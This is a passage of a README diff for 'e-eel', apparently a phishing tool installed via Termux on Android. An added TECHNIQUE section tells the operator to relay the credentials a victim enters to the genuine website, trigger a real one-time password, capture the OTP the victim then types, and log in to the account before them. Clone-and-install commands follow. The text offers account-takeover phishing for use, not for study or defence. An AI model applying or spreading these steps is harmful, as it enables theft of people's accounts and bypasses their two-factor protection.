prasanthc41m/e-eel/README.md

   <a><img title="Built With Love" href="https://github.com/prasanthc41m/e-eel/edit/master/README.md" src="https://c1.wallpaperflare.com/preview/322/194/434/moray-eel-fish-aquarium-moray.jpg" ></a>
  </p>

+# TECHNIQUE
+When victim enter his credentials, you need to go to original website and use those credentials to send real OTP to victim.
+Once he enter that OTP such OTP will also be there with you and you will be allowed to login the account before him.

 # INSTALLATION [ TERMUX APP --ANDROID ]
     git clone https://github.com/prasanthc41m/e-eel.git
     cd e-eel/